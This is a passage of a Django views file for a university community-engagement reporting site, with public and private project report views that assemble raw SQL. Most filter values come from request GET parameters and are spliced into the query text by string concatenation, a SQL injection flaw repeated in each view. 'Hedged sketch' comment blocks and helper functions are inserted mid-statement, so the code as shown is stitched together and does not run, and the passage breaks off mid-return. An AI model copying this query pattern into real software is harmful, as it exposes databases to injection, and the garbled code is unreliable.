campusPartnerProjects = 
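# Hedged sketch (a suggestion, not the original implementation): the report views above splice
# filter values directly into the SQL text. The same optional WHERE clauses can be built with
# placeholders and handed to cursor.execute(sql, params), which sidesteps quoting and injection
# issues. Column references mirror the query above; `build_filter_clause` is an illustrative name.
def build_filter_clause(eng_type, mission_type, campus_partner, college_unit, k12_flag,
                        community_type, cec_camp, cec_comm):
    clause, params = "", []
    for value, fragment in [
        (eng_type, " and e.id::text like %s"),
        (mission_type, " and m.mission_id::text like %s"),
        (campus_partner, " and pp2.campus_partner_id::text like %s"),
        (college_unit, " and c.college_name_id::text like %s"),
        (k12_flag, " and p.k12_flag = %s"),
        (community_type, " and pc.community_type_id::text like %s"),
        (cec_camp, " and c.cec_partner_status_id in"
                   " (select id from partners_cecpartnerstatus where name like %s)"),
        (cec_comm, " and pc.cec_partner_status_id in"
                   " (select id from partners_cecpartnerstatus where name like %s)"),
    ]:
        if value != '%':
            clause += fragment
            params.append(value)
    return clause, params
# Usage (sketch): cursor.execute(project_start_query + clause + group_by_sql, params)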
ProjectCampusPartner.objects.all() for project in ProjectCampusPartner.objects.all(): campusUserProjectsNames.append(project.project_name) for project in Project.objects.all(): if project.pk == int(pk): foundProject = project cp = CampusPartnerUser.objects.filter(user_id=request.user.id)[0].campus_partner object = ProjectCampusPartner(project_name=foundProject, campus_partner=cp) object.save() return redirect("myProjects") #Public reports start here #New view for project public table and card view def projectstablePublicReport(request): selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) 
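# Hedged sketch: each report view recomputes the "current" academic-year label with the same
# month > 7 boundary (August starts a new reporting year). A single helper would keep the rule in
# one place; `default_report_year` is an illustrative name that mirrors the expression used above,
# which labels the most recently completed year.
import datetime


def default_report_year(today=None):
    today = today or datetime.datetime.now()
    if today.month > 7:
        return str(today.year - 1) + "-" + str(today.year)[-2:]
    return str(today.year - 2) + "-" + str(today.year - 1)[-2:]

# Examples: default_report_year(datetime.datetime(2021, 10, 1)) == "2020-21"
#           default_report_year(datetime.datetime(2021, 3, 1)) == "2019-20"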
if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' # params = [eng_type_cond, mission_type_cond, community_type_cond, campus_partner_cond, college_unit_cond, # K12_filter_cond, academic_start_year_cond, academic_end_year_cond, cec_comm_part_cond, cec_camp_part_cond] cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name !='Drafts'\ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND 
\ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= "+ str(academic_end_year_cond)+")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " # cursor.execute(sql.all_projects_sql, params) cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) # cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append( {"name": name, "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19], "end_semester": obj[20], "end_academic_year": obj[21], "sub_category": obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projectspublictableview.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": 
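# Hedged note, expressed as code: the academic-year condition in the WHERE clause above is an
# interval test on AcademicYear primary keys (assuming, as the max(yrs) default does, that ids
# increase chronologically). A project is kept when its [start, COALESCE(end, start)] id range
# covers the selected range; with "All" the range runs from max_yr_id down to 1, i.e. every project.
def year_overlaps(project_start_id, project_end_id, selected_start_id, selected_end_id):
    effective_end = project_end_id if project_end_id is not None else project_start_id  # COALESCE
    return project_start_id <= selected_start_id and effective_end >= selected_end_id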
communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter,'parameters':parameters}) def projectsPublicReport(request): proj_per_page_cnt = 5 proj_per_page = DataDefinition.objects.get(title='project_count_per_page') if proj_per_page is not None: proj_per_page_cnt = proj_per_page.description selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None 
or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " 
and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None and selectedprojectId != '': if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) # cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) print("Project name ------ ", name) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) paginator = Paginator(projects_list, proj_per_page_cnt) try: cards = paginator.page(page) except PageNotAnInteger: cards = paginator.page(1) except EmptyPage: cards = paginator.page(paginator.num_pages) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 
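# Hedged sketch: projectsPublicReport and projectsPrivateReport repeat the same pagination block,
# reading the page size from the DataDefinition row titled 'project_count_per_page'. A helper such
# as this one (the name `paginate_cards` is made up) also survives a missing row and coerces the
# free-text `description` value to int explicitly.
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator


def paginate_cards(request, projects_list, default_per_page=5):
    try:
        per_page = int(DataDefinition.objects.get(title='project_count_per_page').description)
    except (DataDefinition.DoesNotExist, TypeError, ValueError):
        per_page = default_per_page
    paginator = Paginator(projects_list, per_page)
    try:
        return paginator.page(request.GET.get('page', 1))
    except PageNotAnInteger:
        return paginator.page(1)
    except EmptyPage:
        return paginator.page(paginator.num_pages)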
'reports/projects_public_view.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter, 'cards':cards, 'parameters':parameters}) # project private card and table view starts here @login_required() def projectsPrivateReport(request): proj_per_page = DataDefinition.objects.get(title='project_count_per_page') print('proj_per_page--', proj_per_page) proj_per_page_cnt = 5 if proj_per_page is not None: proj_per_page_cnt = proj_per_page.description selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( campus_partner_id__in=campus_filtered_ids)) projects_list = [] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: 
acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, 
p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) page = request.GET.get('page', 1) paginator = Paginator(projects_list, proj_per_page_cnt) try: cards = paginator.page(page) except PageNotAnInteger: cards = paginator.page(1) except EmptyPage: cards = paginator.page(paginator.num_pages) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return 
